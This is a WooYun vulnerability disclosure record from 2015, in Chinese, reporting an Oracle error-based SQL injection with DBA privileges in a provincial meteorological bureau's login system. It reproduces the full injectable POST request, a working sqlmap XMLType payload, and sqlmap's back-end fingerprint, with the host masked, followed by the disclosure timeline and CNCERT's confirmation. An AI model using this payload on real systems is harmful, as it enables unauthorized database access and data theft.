{"id": 79186, "wybug_id": "wooyun-2015-0158691", "wybug_title": "某省气象局某系统DBA权限Oracle注入（涉及20个库）", "wybug_corp": "cncert国家互联网应急中心", "wybug_author": "无名人", "wybug_date": "2015-12-07 14:30", "wybug_open_date": "2016-01-23 15:16", "wybug_type": "SQL注射漏洞", "wybug_level": "高", "wybug_rank_0": "11", "wybug_status": "已交由第三方合作机构(cncert国家互联网应急中心)处理", "wybug_from": "http://www.wooyun.org", "wybug_tags": "", "wybug_detail": "漏洞详情 披露状态：   \t\t\t\t\t\t\t\t\t2015-12-07：\t细节已通知厂商并且等待厂商处理中\t\t\t\t\t\t\t\t\t2015-12-10：\t厂商已经确认，细节仅向厂商公开\t\t\t\t\t\t\t\t\t2015-12-20：\t细节向核心白帽子及相关领域专家公开\t\t\t\t\t\t\t\t\t2015-12-30：\t细节向普通白帽子公开\t\t\t\t\t\t\t\t\t2016-01-09：\t细节向实习白帽子公开\t\t\t\t\t\t\t\t\t2016-01-23：\t细节向公众公开  简要描述： RT 详细说明：  漏洞系统：http://**.**.**.**:8088/漏洞地址：\nPOST / HTTP/1.1Host: **.**.**.**:8088Proxy-Connection: keep-aliveContent-Length: 364Origin: http://**.**.**.**:8088X-Requested-With: XMLHttpRequestCache-Control: no-cacheX-MicrosoftAjax: Delta=trueUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept: */*Referer: http://**.**.**.**:8088/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=g2usanosg1l1qpzd1vjq2d3aScriptManager1=UpdatePanel1%7Csubmit_button&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEwMzI2NzQzNDBkZGDlpJOlJQ7RvzJ60rAoxP5AnsT7j8NdMpxD7pOd9sEA&__EVENTVALIDATION=%2FwEWBALG%2BPWeBwKtodbqDQLKlOHiDQL20JPSCk1YVH6gOV82hy7V2gUCLwYvulOwd0nBxG9CWwaW0EyI&login_user_text=admin*&login_pwd_text=123456&__ASYNCPOST=true&submit_button=%20%E7%99%BB%20%E5%BD%95%20/\nlogin_user_text参数存在报错注入\n---Parameter: #1* ((custom) POST)    Type: error-based    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)    Payload: ScriptManager1=UpdatePanel1|submit_button&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTEwMzI2NzQzNDBkZGDlpJOlJQ7RvzJ60rAoxP5AnsT7j8NdMpxD7pOd9sEA&__EVENTVALIDATION=/wEWBALG+PWeBwKtodbqDQLKlOHiDQL20JPSCk1YVH6gOV82hy7V2gUCLwYvulOwd0nBxG9CWwaW0EyI&login_user_text=admin' AND 2634=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(120)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (2634=2634) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(112)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'uitv'='uitv&login_pwd_text=123456&__ASYNCPOST=true&submit_button= %E7%99%BB %E5%BD%95---[01:50:35] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Oracle\n   漏洞证明：  数据库：\n\ndba权限：\n\n   修复方案：  @@   版权声明：转载请注明来源 无名人@乌云\n ", "wybug_reply": "漏洞回应  厂商回应： 危害等级：高 漏洞Rank：10  确认时间：2015-12-10 18:08 厂商回复： CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置. 最新状态： 暂无  ", "replys": "漏洞评价：\n评价\n  \n\n\n", "wybug_level_fromcorp": "高", "wybug_rank_fromcorp": 10, "Ranks": null}